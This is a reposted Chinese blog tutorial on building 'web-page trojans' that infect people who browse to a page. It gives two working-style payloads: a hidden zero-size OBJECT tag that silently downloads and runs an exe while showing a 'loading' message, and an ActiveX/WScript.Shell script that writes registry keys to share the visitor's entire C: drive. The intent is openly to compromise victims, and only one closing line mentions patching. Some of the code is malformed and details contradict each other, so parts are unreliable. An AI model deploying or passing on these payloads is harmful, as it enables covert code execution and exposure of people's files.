制作網頁木馬

大家對木馬都不陌生了，它可能要算是計算機病毒史上最厲害的了，相信會使木馬的人千千萬萬，但是有很多人苦于怎麼把木馬發給對方，現在随着計算機的普及，在網絡上我相信很少有人會再輕易的接收對方的檔案了，是以網頁木馬誕生了。 

1.它應該算是html帶動同路徑下的一個exe的檔案的首頁了，也就是當浏覽器浏覽這個頁面的時候，一個exe的檔案就在背景自動下載下傳并執行了，可以做一個test.html的檔案在桌面，内容如下： 

<script language="javascript"> 

run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" 

run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">" 

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">" 

run_exe+="</OBJECT>" 

run_exe+="<HTML><H1>網頁加載中，請稍後....</H1></HTML>"; 

document.open(); 

document.clear(); 

document.writeln(run_exe); 

document.close(); 

</script> 

再在桌面下随便找個exe的檔案，名字一定要改為tset.exe，好了，這時候輕按兩下我們剛才生成的html檔案，當看到“網頁加載中，請稍後....”的時候，我們的那個同路徑下的exe檔案也被無條件執行了，這種頁面的優點就是編譯修改簡單，但是！當你申請下了一個個人首頁空間的時候，把這兩個檔案上傳上去的時候，當你試圖通過浏覽器浏覽你的傑作的時候，ie的安全警告跳了出來，我想沒有幾個人願意乖乖的冒着風險去點“是”，好了，盡管這個網頁木馬在本地是多麼的完美，但是放到了網上就通不過ie的安全政策了，這個小馬失敗了。 

2.是通過ie自身的漏洞寫入系統資料庫，相信很多人經常在浏覽一些首頁的時候，系統資料庫被改的亂七八糟、ie标題被改、首頁被改、系統資料庫編輯器被禁用等等，這些都是自動修改了你的系統資料庫的網頁的傑作，是以我門也可以做個頁面讓浏覽者的硬碟完全共享，也是做個html的檔案，内容如下： 

script language=javascript> 

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); 

function f(){ 

a1=document.applets[0]; 

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 

a1.createInstance(); 

Shl = a1.GetObject(); 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD"); 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD" 

); 

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\"); 

} 

function init() 

{ 

setTimeout("f()", 1000); 

init(); 

這種網頁木馬的特點是比較安全，不宜被對方發現，但是使用麻煩需要牽扯到很多的東西。 

這種網頁木馬的特點是，對方挨種率較高，除了制作麻煩一點外，沒有什麼缺點啦 

好了所有的漏洞都是建立在系統漏洞的前提下，多更新多打更新檔沒有壞處

本文轉自loveme2351CTO部落格，原文連結：http://blog.51cto.com/loveme23/8514 ，如需轉載請自行聯系原作者